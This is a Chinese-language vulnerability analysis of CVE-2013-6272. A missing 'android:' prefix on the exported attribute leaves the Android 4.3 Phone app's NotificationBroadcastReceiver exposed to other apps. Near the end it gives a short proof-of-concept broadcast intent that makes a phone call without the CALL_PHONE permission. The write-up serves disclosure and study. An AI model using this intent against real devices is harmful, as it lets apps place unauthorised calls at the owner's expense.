2. 漏洞细节
在Android源码(以JELLY_BEAN 4.3为例) /packages/apps/Phone/src/com/android/phone/PhoneGlobals.java存在一个名为NotificationBroadcastReceiver的BroadcastReceiver.
public static class NotificationBroadcastReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { String action = intent.getAction(); // TODO: use "if (VDBG)" here. Log.d(LOG_TAG, "Broadcast from Notification: " + action); if (action.equals(ACTION_HANG_UP_ONGOING_CALL)) { PhoneUtils.hangup(PhoneGlobals.getInstance().mCM); } else if (action.equals(ACTION_CALL_BACK_FROM_NOTIFICATION)) { // Collapse the expanded notification and the notification item itself. closeSystemDialogs(context); clearMissedCallNotification(context); Intent callIntent = new Intent(Intent.ACTION_CALL_PRIVILEGED, intent.getData()); callIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS); context.startActivity(callIntent); } else if (action.equals(ACTION_SEND_SMS_FROM_NOTIFICATION)) { // Collapse the expanded notification and the notification item itself. closeSystemDialogs(context); clearMissedCallNotification(context); Intent smsIntent = new Intent(Intent.ACTION_SENDTO, intent.getData()); smsIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); context.startActivity(smsIntent); } else { Log.w(LOG_TAG, "Received hang-up request from notification," + " but there‘s no call the system can hang up."); } }
(2)ACTION_CALL_BACK_FROM_NOTIFICATION:发送 action为Intent.ACTION_CALL_PRIVILEGED的intent,最终会启动拨号的Activity(为OutgoingCallBroadcaster,从AndroidManifest得知),直接拨号;
Accepts broadcast Intents which will be prepared by {@link NotificationMgr} and thus sent from framework‘s notification mechanism (which is outside Phone context).This should be visible from outside, but shouldn‘t be in "exported" state.
<!-- BroadcastReceiver for receiving Intents from Notification mechanism. -->
521 <receiver android:name="PhoneGlobals$NotificationBroadcastReceiver" exported="false">
522 <intent-filter>
523 <action android:name="com.android.phone.ACTION_HANG_UP_ONGOING_CALL" />
524 <action android:name="com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION" />
525 <action android:name="com.android.phone.ACTION_SEND_SMS_FROM_NOTIFICATION" />
526 </intent-filter>
527 </receiver>
在android sdk文档中有如下对receiver组件manifest中android:exported属性的说明。
Whether or not the broadcast receiver can receive messages from sources
outside its application — "true
" if it can, and "false
if not. If "false
", the only messages the broadcast receiver can
receive are those sent by components of the same application or applications
with the same user ID.
The default value depends on whether the broadcast receiver contains intent filters.
The absence of any filters means that it can be invoked only by Intent objects that
specify its exact class name. This implies that the receiver is intended only for
application-internal use (since others would not normally know the class name).
So in this case, the default value is "false
On the other hand, the presence of at least one filter implies that the broadcast
receiver is intended to receive intents broadcast by the system or other applications,
so the default value is "true
This attribute is not the only way to limit a broadcast receiver‘s external exposure.
You can also use a permission to limit the external entities that can send it messages
(see the permission
当为true时表明该receiver可以接收所属应用以外的消息,而为false时,只能接收同一应用组件或同一uid应用所发送的消息。而该属性的默认值取决于是否声明Intent filter,当没有声明时,默认为flase;当声明至少一个Intent filter时,默认为true。在package.apps.Phone的manifest文件中,由于少敲了个android,实际是没有设置android:exported属性,而该文件又声明了3个intent filter,因此取默认值true。这就是漏洞的成因。
3. 漏洞利用与危害
protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.newmain); bt = (Button)findViewById(R.id.btn1); edt = (EditText)findViewById(R.id.edit1); bt.setOnClickListener(new Button.OnClickListener() { public void onClick(View v) { String inputStr = edt.getText().toString(); if(inputStr.trim().length()!= 0) { Intent phoneIntent = new Intent("android.intent.action.CALL", Uri.parse("tel:" + inputStr)); startActivity(phoneIntent); } else { Toast.makeText(MainActivity.this, "请输入号码!", Toast.LENGTH_LONG).show(); } } });
<uses-permission android:name="android.permission.CALL_PHONE" />
Intent intent = new Intent(); intent.setComponent(new ComponentName("com.android.phone","com.android.phone.PhoneGlobals$NotificationBroadcastReceiver")); intent.setAction("com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION"); intent.setData(Uri.parse("tel:xxx")); intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); sendBroadcast(intent);
4. 影响范围与POC
[1] http://1.xbalien.sinaapp.com/?p=171
[3] http://blog.curesec.com/article/blog/35.html
CVE 2013-6272 Android phone提权打电话漏洞分析